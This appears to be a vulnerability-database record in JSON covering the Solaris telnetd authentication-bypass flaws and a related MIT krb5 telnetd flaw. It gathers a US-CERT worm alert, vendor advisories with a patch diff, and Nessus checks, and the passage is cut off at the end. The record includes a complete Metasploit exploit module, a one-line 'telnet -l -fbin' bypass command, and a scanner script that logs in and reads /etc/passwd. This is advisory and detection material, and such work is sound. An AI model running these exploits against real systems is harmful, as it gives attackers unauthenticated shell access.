href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0882\"><font color=\"#333333\">\uff1a</font>http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0882</a></p><p> \u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8865\u4e01\u4e0b\u8f7d\u94fe\u63a5\uff1a <a href=\"http://sunsolve.sun.com/search/printfriendly.do?assetkey=1-26-102802-1\" rel=\"nofollow\">http://sunsolve.sun.com/search/printfriendly.do?assetkey=1-26-102802-1</a> </p>", "modified": "2002-01-18T00:00:00", "published": "2002-01-18T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-18010", "id": "SSV:18010", "title": "Solaris in.telnetd TTYPROMPT Buffer Overflow", "type": "seebug", "sourceData": "\n ##\r\n# $Id$\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to \r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\n\r\nrequire 'msf/core'\r\n\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\r\n\tinclude Msf::Exploit::Remote::Tcp\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\t\r\n\t\t\t'Name' => 'Solaris in.telnetd TTYPROMPT Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\tThis module uses a buffer overflow in the Solaris 'login'\r\n\t\t\tapplication to bypass authentication in the telnet daemon. \r\n\t\t\t},\r\n\t\t\t'Author' => [ 'MC', 'cazz' ],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => '$Revision$',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2001-0797'],\r\n\t\t\t\t\t[ 'OSVDB', '690'],\r\n\t\t\t\t\t[ 'BID', '5531'],\r\n\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'Platform' => ['unix', 'solaris'],\r\n\t\t\t'Arch' => ARCH_CMD,\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 2000,\r\n\t\t\t\t\t'BadChars' => '',\r\n\t\t\t\t\t'DisableNops' => true,\r\n\t\t\t\t\t'Compat' =>\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'PayloadType' => 'cmd',\r\n\t\t\t\t\t\t\t'RequiredCmd' => 'generic perl telnet',\r\n\t\t\t\t\t\t}\r\n\t\t\t\t},\r\n\t\t\t'Targets' => \r\n\t\t\t\t[\r\n\t\t\t\t\t['Automatic', { }],\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Jan 18 2002',\r\n\t\t\t'DefaultTarget' => 0))\r\n\t\t\t\r\n\t\t\tregister_options(\r\n\t\t\t\t[\r\n\t\t\t\t\tOpt::RPORT(23),\r\n\t\t\t\t\tOptString.new('USER', [ true, "The username to use", "bin" ]),\r\n\t\t\t\t], self.class)\r\n\tend\r\n\r\n\tdef exploit\r\n\t\tconnect\r\n\t\r\n\t\tbanner = sock.get_once\r\n\t\t\r\n\t\tprint_status('Setting TTYPROMPT...')\r\n\t\t\r\n\t\treq = \r\n\t\t\t"\\xff\\xfc\\x18" +\r\n\t\t\t"\\xff\\xfc\\x1f" +\r\n\t\t\t"\\xff\\xfc\\x21" +\r\n\t\t\t"\\xff\\xfc\\x23" +\r\n\t\t\t"\\xff\\xfb\\x22" +\r\n\t\t\t"\\xff\\xfc\\x24" +\r\n\t\t\t"\\xff\\xfb\\x27" +\r\n\t\t\t"\\xff\\xfb\\x00" +\r\n\t\t\t"\\xff\\xfa\\x27\\x00" +\r\n\t\t\t"\\x00TTYPROMPT" +\r\n\t\t\t"\\x01" + \r\n\t\t\trand_text_alphanumeric(6) + \r\n\t\t\t"\\xff\\xf0"\t\r\n\t\t\r\n\t\tsock.put(req)\r\n\t\tsleep(0.25)\r\n\t\t\r\n\t\tprint_status('Sending username...')\r\n\t\r\n\t\tfiller = rand_text_alpha(rand(10) + 1)\r\n \r\n\t\treq << datastore['USER'] + (" #{filler}" * 65) \r\n\t\t\r\n\t\tsock.put(req + "\\n\\n\\n")\r\n\r\n\t\tsleep(0.25)\r\n\t\tsock.get_once\r\n\t\t\r\n\t\tsock.put(payload.encoded + "\\n")\r\n\r\n\t\tsleep(0.25)\r\n\t\t\r\n\t\thandler\r\n\tend\r\n\r\nend\r\n\n ", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-18010"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:21", "bulletinFamily": "software", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n\r\n National Cyber Alert System\r\n\r\n Technical Cyber Security Alert TA07-059A\r\n\r\n\r\nSun Solaris Telnet Worm\r\n\r\n Original release date: February 28, 2007\r\n Last revised: --\r\n Source: US-CERT\r\n\r\n\r\nSystems Affected\r\n\r\n * Sun Solaris 10 (SunOS 5.10)\r\n * Sun "Nevada" (SunOS 5.11)\r\n\r\n Both SPARC and Intel (x86) architectures are affected.\r\n\r\n\r\nOverview\r\n\r\n A worm is exploiting a vulnerability (VU#881872) in the Sun Solaris\r\n telnet daemon (in.telnetd).\r\n\r\n\r\nI. Description\r\n\r\n A worm is exploiting a vulnerability in the telnet daemon\r\n (in.telnetd) on unpatched Sun Solaris systems. The vulnerability\r\n allows the worm (or any attacker) to log in via telnet (23/tcp)\r\n with elevated privileges. Further details about the vulnerability\r\n are available in Vulnerability Note VU#881872 (CVE-2007-0882).\r\n\r\n Because VU#881872 is trivial to exploit and sufficient technical\r\n detail is publicly available, any attacker, not just this worm,\r\n could exploit vulnerable systems.\r\n\r\n Characteristics of the worm include, but are not limited to:\r\n \r\n * Exploiting VU#881872 to log in via telnet as the users adm or lp\r\n * Changing permissions on /var/adm/wtmpx to -rw-r--rw-\r\n * Creating the directory .adm in /var/adm/sa/\r\n * Adding .profile files to /var/adm/ and /var/spool/lp/\r\n * Installing an authenticated backdoor shell on port 32982/tcp\r\n * Modifying crontab entries for the users adm and lp\r\n * Scanning for other hosts running telnet (23/tcp)\r\n\r\n Sun has published information about the worm in the Security Sun\r\n Alert Feed including an inoculation script that disables the telnet\r\n daemon and reverses known changes made by the worm.\r\n\r\n\r\nII. Impact\r\n\r\n VU#881872 allows remote attacker to log on to a vulnerable system\r\n via telnet and gain elevated privileges. The worm exploits this\r\n vulnerability to compromise systems as described above. Since the\r\n worm installs a backdoor shell, it is possible for an attacker with\r\n knowledge of the authentication tokens to access a compromised\r\n system and take any action with the privileges of the backdoor\r\n shell process, likely adm or lp.\r\n\r\n\r\nIII. Solution\r\n\r\nApply a patch\r\n\r\n To address VU#881872, apply the appropriate patches referenced in\r\n Sun Alert Notification 102802.\r\n\r\nRun inoculation script\r\n\r\n To recover compromised systems, Sun has provided an inoculation script\r\n that disables the telnet daemon and reverses known changes made by the\r\n worm.\r\n\r\n Note that the inoculation script only recovers from this particular\r\n worm. Running the inoculation script does not guarantee system\r\n integrity. A vulnerable system may be compromised in different ways\r\n by attackers exploiting VU#881872 or using the backdoor installed\r\n by the worm. To fully recover, it may be necessary to rebuild a\r\n compromised system using trusted software sources. For more\r\n information, see Recovering from an Incident.\r\n\r\n\r\nIV. Workarounds\r\n\r\n Until the appropriate patches can be applied, consider the\r\n following workarounds.\r\n\r\nDisable telnet\r\n\r\n Telnet can be disabled by issuing the following command as root:\r\n\r\n # /usr/sbin/svcadm disable telnet\r\n\r\nRestrict telnet access\r\n\r\n Restrict access to telnet (23/tcp) from untrusted networks such as\r\n the Internet.\r\n\r\nUse SSH instead of telnet\r\n\r\n SSH provides a comparatively more secure method for remotely\r\n logging into a system than telnet. As general advice, we recommend\r\n using SSH rather than telnet.\r\n\r\n\r\nV. References\r\n\r\n * US-CERT Vulnerability Note VU#881872 -\r\n <http://www.kb.cert.org/vuls/id/881872>\r\n\r\n * Recovering from an Incident -\r\n <http://www.cert.org/nav/recovering.html>\r\n\r\n * Sun Alert Notification 102802 -\r\n <http://sunsolve.sun.com/search/document.do?assetkey=1-26-102802-1>\r\n\r\n * Solaris in.telnetd worm seen in the wild + inoculation script -\r\n <http://blogs.sun.com/security/entry/solaris_in_telnetd_worm_seen>\r\n\r\n * inoculate.local -\r\n <http://blogs.sun.com/security/resource/inoculate.local>\r\n\r\n * CVE-2007-0882 -\r\n <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0882>\r\n\r\n\r\n ____________________________________________________________________\r\n\r\n The most recent version of this document can be found at:\r\n\r\n <http://www.us-cert.gov/cas/techalerts/TA07-059A.html>\r\n ____________________________________________________________________\r\n\r\n Feedback can be directed to US-CERT Technical Staff. Please send\r\n email to <cert@cert.org> with "TA07-059A Feedback VU#881872" in the\r\n subject.\r\n ____________________________________________________________________\r\n\r\n For instructions on subscribing to or unsubscribing from this\r\n mailing list, visit <http://www.us-cert.gov/cas/signup.html>.\r\n ____________________________________________________________________\r\n\r\n Produced 2007 by US-CERT, a government organization.\r\n\r\n Terms of use:\r\n\r\n <http://www.us-cert.gov/legal.html>\r\n ____________________________________________________________________\r\n\r\n\r\nRevision History\r\n\r\n February 28, 2007: Initial release\r\n\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.2.1 (GNU/Linux)\r\n\r\niQEVAwUBReYctOxOF3G+ig+rAQKGUAf+LY2zbs3k8mx3mYhgtpLWCCOo5wDjd90a\r\ng+apWM4B9qEsAvlIsI/tWof5xSf682D7Yx47xwDDxUyIswHkovGaIWQ7TKmew1Be\r\nOn7KUFSi0fHQ9Su4536COmr3aCOoeXhPpIIC8nFyb9rZ22aax6LowxH4THU1uFRO\r\nvITWFHKuWkSW75D4WQ9z19m1cdkXf2Y6SC9UcqADdImFo0ZG/mVzQ8as1sb3nHM7\r\n0cBje0Dt4rEUtMkgBRrIMqoa1FquJXnLT0YnUtQp914SguxhD5sB/shjiIrttpVq\r\nuROeI77nsfGzAyWLes2K/fDik4/HJLIgiTpnONBTrXNYuuTsfKOJ0Q==\r\n=rcWZ\r\n-----END PGP SIGNATURE-----", "modified": "2007-03-01T00:00:00", "published": "2007-03-01T00:00:00", "id": "SECURITYVULNS:DOC:16220", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:16220", "title": "US-CERT Technical Cyber Security Alert TA07-059A -- Sun Solaris Telnet Worm", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:23", "bulletinFamily": "software", "description": "User's pasword is not checked in telnet session if F flag is set. On older versions defining TTYPROMPT variable allows unauthorized access with bin group privileges. Vulnerability is used by internet worm.", "modified": "2007-03-01T00:00:00", "published": "2007-03-01T00:00:00", "id": "SECURITYVULNS:VULN:7211", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:7211", "title": "Sun Solaris unauthorized access", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:21", "bulletinFamily": "software", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n MIT krb5 Security Advisory 2007-001\r\n\r\nOriginal release: 2007-04-03\r\nLast update: 2007-04-03\r\n\r\nTopic: telnetd allows login as arbitrary user\r\n\r\nSeverity: CRITICAL\r\n\r\nCVE: CVE-2007-0956\r\nCERT: VU#220816\r\n\r\nSUMMARY\r\n=======\r\n\r\nThe MIT krb5 telnet daemon (telnetd) allows unauthorized login as an\r\narbitrary user, when presented with a specially crafted username.\r\nExploitation of this vulnerability is trivial.\r\n\r\nThis is a vulnerability in an application program; it is not a bug in\r\nthe MIT krb5 libraries or in the Kerberos protocol.\r\n\r\nIMPACT\r\n======\r\n\r\nA user can gain unauthorized access to any account (including root) on\r\na host running telnetd. Whether the attacker needs to authenticate\r\ndepends on the configuration of telnetd on that host.\r\n\r\nAFFECTED SOFTWARE\r\n=================\r\n\r\n* telnetd in all releases of MIT krb5, up to and including krb5-1.6\r\n\r\nFIXES\r\n=====\r\n\r\n* The upcoming krb5-1.6.1 release will contain a fix for this\r\n vulnerability.\r\n\r\nPrior to that release you may:\r\n\r\n* disable telnetd\r\n\r\nor\r\n\r\n* apply the patch\r\n\r\n This patch is also available at\r\n\r\n http://web.mit.edu/kerberos/advisories/2007-001-patch.txt\r\n\r\n A PGP-signed patch is available at\r\n\r\n http://web.mit.edu/kerberos/advisories/2007-001-patch.txt.asc\r\n\r\n*** src/appl/telnet/telnetd/state.c (revision 19480)\r\n- --- src/appl/telnet/telnetd/state.c (local)\r\n***************\r\n*** 1665,1671 ****\r\n strcmp(varp, "RESOLV_HOST_CONF") && /* linux */\r\n strcmp(varp, "NLSPATH") && /* locale stuff */\r\n strncmp(varp, "LC_", strlen("LC_")) && /* locale stuff */\r\n! strcmp(varp, "IFS")) {\r\n return 1;\r\n } else {\r\n syslog(LOG_INFO, "Rejected the attempt to modify the environment variable \"%s\"", varp);\r\n- --- 1665,1672 ----\r\n strcmp(varp, "RESOLV_HOST_CONF") && /* linux */\r\n strcmp(varp, "NLSPATH") && /* locale stuff */\r\n strncmp(varp, "LC_", strlen("LC_")) && /* locale stuff */\r\n! strcmp(varp, "IFS") &&\r\n! !strchr(varp, '-')) {\r\n return 1;\r\n } else {\r\n syslog(LOG_INFO, "Rejected the attempt to modify the environment variable \"%s\"", varp);\r\n*** src/appl/telnet/telnetd/sys_term.c (revision 19480)\r\n- --- src/appl/telnet/telnetd/sys_term.c (local)\r\n***************\r\n*** 1287,1292 ****\r\n- --- 1287,1302 ----\r\n #endif\r\n #if defined (AUTHENTICATION)\r\n if (auth_level >= 0 && autologin == AUTH_VALID) {\r\n+ if (name[0] == '-') {\r\n+ /* Authenticated and authorized to log in to an\r\n+ account starting with '-'? Even if that\r\n+ unlikely case comes to pass, the current login\r\n+ program will not parse the resulting command\r\n+ line properly. */\r\n+ syslog(LOG_ERR, "user name cannot start with '-'");\r\n+ fatal(net, "user name cannot start with '-'");\r\n+ exit(1);\r\n+ }\r\n # if !defined(NO_LOGIN_F)\r\n #if defined(LOGIN_CAP_F)\r\n argv = addarg(argv, "-F");\r\n***************\r\n*** 1377,1387 ****\r\n } else\r\n #endif\r\n if (getenv("USER")) {\r\n! argv = addarg(argv, getenv("USER"));\r\n #if defined(LOGIN_ARGS) && defined(NO_LOGIN_P)\r\n {\r\n register char **cpp;\r\n for (cpp = environ; *cpp; cpp++)\r\n argv = addarg(argv, *cpp);\r\n }\r\n #endif\r\n- --- 1387,1405 ----\r\n } else\r\n #endif\r\n if (getenv("USER")) {\r\n! char *user = getenv("USER");\r\n! if (user[0] == '-') {\r\n! /* "telnet -l-x ..." */\r\n! syslog(LOG_ERR, "user name cannot start with '-'");\r\n! fatal(net, "user name cannot start with '-'");\r\n! exit(1);\r\n! }\r\n! argv = addarg(argv, user);\r\n #if defined(LOGIN_ARGS) && defined(NO_LOGIN_P)\r\n {\r\n register char **cpp;\r\n for (cpp = environ; *cpp; cpp++)\r\n+ if ((*cpp)[0] != '-')\r\n argv = addarg(argv, *cpp);\r\n }\r\n #endif\r\n\r\nREFERENCES\r\n==========\r\n\r\nThis announcement is posted at:\r\n\r\n http://web.mit.edu/kerberos/advisories/MITKRB5-SA-2007-001-telnetd.txt\r\n\r\nThis announcement and related security advisories may be found on the\r\nMIT Kerberos security advisory page at:\r\n\r\n http://web.mit.edu/kerberos/advisories/index.html\r\n\r\nThe main MIT Kerberos web page is at:\r\n\r\n http://web.mit.edu/kerberos/index.html\r\n\r\nCVE: CVE-2007-0956\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0956\r\n\r\nCERT: VU#220816\r\nhttp://www.kb.cert.org/vuls/id/220816\r\n\r\nACKNOWLEDGMENTS\r\n===============\r\n\r\nThis vulnerability was found when attempting to confirm the absence of\r\na related vulnerability in the Solaris telnetd. [CVE-2007-0882]\r\n\r\nDETAILS\r\n=======\r\n\r\nThe MIT krb5 telnet daemon fails to adequately check the provided\r\nusername. A malformed username beginning with "-e" can be interpreted\r\nas a command-line flag by the login.krb5 program, which is executed by\r\ntelnetd. This causes login.krb5 to execute part of the BSD rlogin\r\nprotocol, where an arbitrary username may be injected, allowing login\r\nas that user without a password or any further authentication.\r\n\r\nIf the telnet daemon is configured to only permit authenticated login,\r\nthen only authenticated users can exploit this vulnerability.\r\n\r\nREVISION HISTORY\r\n================\r\n\r\n2007-04-03 original release\r\n\r\nCopyright (C) 2007 Massachusetts Institute of Technology\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.6 (SunOS)\r\n\r\niQCVAwUBRhKVRabDgE/zdoE9AQIzPAQAj8a7ShfHXVVMOPQhEyoN/Ydnalnfa2xE\r\ncl7UXFSjmkexalD+rymL0upLFw7EVgnYrVazc+AUhDLt1AZmCl5Lj2+WAcl1QYPu\r\nfEGm2SFaS4Eda6NRb6xZ4BeY8zfRWFN2G8Bb5krpGj+oEX/c3Xg8O4oUyiJBYBQi\r\nTXhryamn6Yw=\r\n=aE5C\r\n-----END PGP SIGNATURE-----", "modified": "2007-04-04T00:00:00", "published": "2007-04-04T00:00:00", "id": "SECURITYVULNS:DOC:16558", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:16558", "title": "MITKRB5-SA-2007-001: telnetd allows login as arbitrary user [CVE-2007-0956]", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:28", "bulletinFamily": "software", "description": "## Vulnerability Description\nSolaris contains a flaw that may allow a malicious user to log in as an arbitrary user. The issue is triggered when a specified command-line option is provided to the in.telnetd daemon. It is possible that the flaw may allow unauthorized login resulting in a loss of integrity.\n## Solution Description\nCurrently, there are no known workarounds or upgrades to correct this issue. However, Sun has released a patch to address this vulnerability.\n## Short Description\nSolaris 10 Forced Login in.telnetd Authentication Bypass\n## Manual Testing Notes\n$ telnet -l \"-fbin\" [target]\n## References:\nVendor Specific Solution URL: http://sunsolve.sun.com/search/document.do?assetkey=1-26-102802-1\nSecurity Tracker: 1017625\n[Secunia Advisory ID:24120](https://secuniaresearch.flexerasoftware.com/advisories/24120/)\n[Related OSVDB ID: 1007](https://vulners.com/osvdb/OSVDB:1007)\nOther Advisory URL: http://www.com-winner.com/0day_was_the_case_that_they_gave_me.pdf\nOther Advisory URL: http://erratasec.blogspot.com/2007/02/trivial-remote-solaris-0day-disable.html\nNews Article: http://www.theregister.co.uk/2007/03/01/solaris_security_worm/\nNews Article: http://news.com.com/Suns+Solaris+10+at+risk+of+zero-day+exploit/2100-1002_3-6158955.html\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2007-02/0252.html\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2007-02/0254.html\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2007-02/0256.html\nMail List Post: http://whitestar.linuxbox.org/pipermail/exploits/2007-February/000097.html\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2007-02/0218.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-02/0231.html\nISS X-Force ID: 32434\nGeneric Informational URL: http://isc.sans.org/diary.html?storyid=2220\nGeneric Exploit URL: http://www.milw0rm.com/exploits/3293\nFrSIRT Advisory: ADV-2007-0560\n[CVE-2007-0882](https://vulners.com/cve/CVE-2007-0882)\nCERT VU: 881872\nBugtraq ID: 22512\n", "modified": "2007-02-10T13:45:33", "published": "2007-02-10T13:45:33", "href": "https://vulners.com/osvdb/OSVDB:31881", "id": "OSVDB:31881", "title": "Solaris Forced Login in.telnetd Authentication Bypass", "type": "osvdb", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2019-12-13T09:20:06", "bulletinFamily": "scanner", "description": "The remote version of telnet does not sanitize the user-supplied\n", "modified": "2019-12-02T00:00:00", "id": "SOLARIS10_TELNET_ENV.NASL", "href": "https://www.tenable.com/plugins/nessus/24323", "published": "2007-02-12T00:00:00", "title": "Solaris 10 Forced Login Telnet Authentication Bypass", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\nif (description) {\n script_id(24323);\n script_version(\"1.32\");\n script_cve_id(\"CVE-2007-0882\");\n script_bugtraq_id(22512);\n\n script_name(english:\"Solaris 10 Forced Login Telnet Authentication Bypass\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"It is possible to log into the remote system using telnet without\nsupplying any credentials\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote version of telnet does not sanitize the user-supplied\n'USER' environment variable. By supplying a specially malformed USER\nenvironment variable, an attacker may force the remote telnet server\nto believe that the user has already authenticated. \n\nFor instance, the following command :\n\n\ttelnet -l '-fbin' target.example.com \n\nwill result in obtaining a shell with the privileges of the 'bin'\nuser.\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Install patches 120068-02 (sparc) or 120069-02 (i386),\nwhich are available from Sun.\n\nFilter incoming to this port or disable the telnet service \nand use SSH instead, or use inetadm to mitigate this \nproblem (see the link below).\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Sun Solaris Telnet Remote Authentication Bypass Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(94);\n script_set_attribute(attribute:\"see_also\", value:\"http://lists.sans.org/pipermail/list/2007-February/025935.html\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://isc.sans.org/diary.html?storyid=2220\" );\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2007/02/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value: \"2007/02/13\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2007/02/10\");\n script_cvs_date(\"Date: 2019/10/25 13:36:24\");\nscript_set_attribute(attribute:\"plugin_type\", value:\"remote\");\nscript_set_attribute(attribute:\"cpe\", value:\"cpe:/o:sun:solaris\");\nscript_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_end_attributes();\n\n script_summary(english:\"Attempts to log in as -fbin\");\n script_category(ACT_ATTACK);\n script_copyright(english:\"This script is Copyright (C) 2007-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gain a shell remotely\");\n script_dependencie(\"find_service1.nasl\", \"openwrt_blank_telnet_password.nasl\");\n script_exclude_keys(\"openwrt/blank_telnet_password\");\n script_require_ports(\"Services/telnet\", 23);\n exit(0);\n}\n\ninclude(\"data_protection.inc\");\n\nif (get_kb_item(\"openwrt/blank_telnet_password\")) exit(0, \"Ignoring host with an unpassworded OpenWrt Telnet service.\");\n\nOPT_WILL = 0xfb;\nOPT_WONT = 0xfc;\nOPT_DO = 0xfd;\nOPT_DONT = 0xfe;\n\nOPT_SUBOPT = 0xfa;\nOPT_ENDSUBOPT = 0xf0;\n\nOPT_ENV\t\t= 0x27;\n\nport = get_kb_item(\"Services/telnet\");\nif(!port) port = 23;\nif(!get_port_state(port))exit(0);\n\n\nsoc = open_sock_tcp(port);\nif ( ! soc ) exit(0);\n\nsend(socket:soc, data:raw_string(0xff, OPT_WILL, OPT_ENV));\n\ntimeout = 5;\n\nwhile ( TRUE )\n{\n counter ++;\n if ( counter > 200 ) break;\n s = recv(socket:soc, length:1, timeout:timeout);\n timeout = 5;\n if ( strlen(s) == 0 ) break; # End of options ?\n if ( ord(s[0]) != 0xff )\n\t break;\n\n else {\n\t s = recv(socket:soc, length:2);\n\t if ( strlen(s) != 2 ) break;\n \t if ( ord(s[0]) == OPT_DO && ord(s[1]) == OPT_ENV )\n\t {\n\t send(socket:soc, data:raw_string(0xff, OPT_SUBOPT, OPT_ENV) + raw_string(0,0) + 'USER' + raw_string(1) + '-fbin' + raw_string(0xff, OPT_ENDSUBOPT));\n\t }\n\t else if ( ord(s[0]) == OPT_DO && ord(s[1]) != OPT_ENV ) send(socket:soc, data:raw_string(0xff, OPT_WONT) + s[1]);\n \t else if ( ord(s[0]) == OPT_WILL ) send(socket:soc, data:raw_string(0xff, OPT_DONT) + s[1]);\n \t else if ( ord(s[0]) == OPT_SUBOPT )\n\t {\n\t prev = recv(socket:soc, length:1);\n counter2 = 0;\n while ( strlen(prev) && ord(prev[0]) != 0xff && ord(s[0]) != OPT_ENDSUBOPT )\n {\n prev = s;\n # No timeout - the answer is supposed to be cached\n s = recv(socket:soc, length:1, timeout:0);\n if ( ! strlen(s) ) exit(0);\n counter2++;\n if ( counter2 >= 100 ) exit(0);\n\t }\n\t }\n \t}\n}\n\nr = recv(socket:soc, length:4096);\nsend(socket:soc, data:'id\\r\\n');\nr = recv(socket:soc, length:4096, min:4096);\nif ( (uid = egrep(pattern:\"uid=\", string:r)) )\n{\n send(socket:soc, data:'cat /etc/passwd\\r\\n');\n passwd = recv(socket:soc, length:65535, min:65535);\n passwd = data_protection::redact_etc_passwd(output:passwd);\n report = 'It was possible to log into the remote host as \\'bin\\' :\\n' + uid + '\\nThe file /etc/passwd contains :\\n\\n' + passwd;\n security_hole(port:port, extra:report);\n} \n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-09-01T23:40:47", "bulletinFamily": "scanner", "description": "SunOS 5.10_x86: in.telnetd patch.\nDate this patch was last updated by Sun : Feb/21/07", "modified": "2018-08-13T00:00:00", "published": "2007-02-14T00:00:00", "id": "SOLARIS10_X86_120069.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=24342", "title": "Solaris 10 (x86) : 120069-03", "type": "nessus", "sourceData": "\n# @DEPRECATED@\n#\n# This script has been deprecated as the associated patch is not\n# currently a recommended security fix.\n#\n# Disabled on 2011/09/17.\n\n#\n# (C) Tenable Network Security, Inc.\n#\n#\n\nif ( ! defined_func(\"bn_random\") ) exit(0);\ninclude(\"compat.inc\");\n\nif(description)\n{\n script_id(24342);\n script_version(\"1.23\");\n\n script_name(english: \"Solaris 10 (x86) : 120069-03\");\n script_xref(name:\"IAVB\", value:\"2007-B-0006\");\n script_cve_id(\"CVE-2007-0882\");\n script_set_attribute(attribute: \"synopsis\", value:\n\"The remote host is missing Sun Security Patch number 120069-03\");\n script_set_attribute(attribute: \"description\", value:\n'SunOS 5.10_x86: in.telnetd patch.\nDate this patch was last updated by Sun : Feb/21/07');\n script_set_attribute(attribute: \"solution\", value:\n\"You should install this patch for your system to be up-to-date.\");\n script_set_attribute(attribute: \"see_also\", value:\n\"https://getupdates.oracle.com/readme/120069-03\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Sun Solaris Telnet Remote Authentication Bypass Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(94);\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2007/02/14\");\n script_cvs_date(\"Date: 2018/08/13 14:32:38\");\n script_set_attribute(attribute:\"patch_publication_date\", value: \"2007/02/13\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2007/02/10\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_summary(english: \"Check for patch 120069-03\");\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2018 Tenable Network Security, Inc.\");\n family[\"english\"] = \"Solaris Local Security Checks\";\n script_family(english:family[\"english\"]);\n \n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/Solaris/showrev\");\n exit(0);\n}\n\n\n\n# Deprecated.\nexit(0, \"The associated patch is not currently a recommended security fix.\");\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:38:52", "bulletinFamily": "scanner", "description": "SunOS 5.10: in.telnetd patch.\nDate this patch was last updated by Sun : Feb/21/07", "modified": "2018-08-13T00:00:00", "published": "2007-02-14T00:00:00", "id": "SOLARIS10_120068.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=24343", "title": "Solaris 10 (sparc) : 120068-03", "type": "nessus", "sourceData": "\n# @DEPRECATED@\n#\n# This script has been deprecated as the 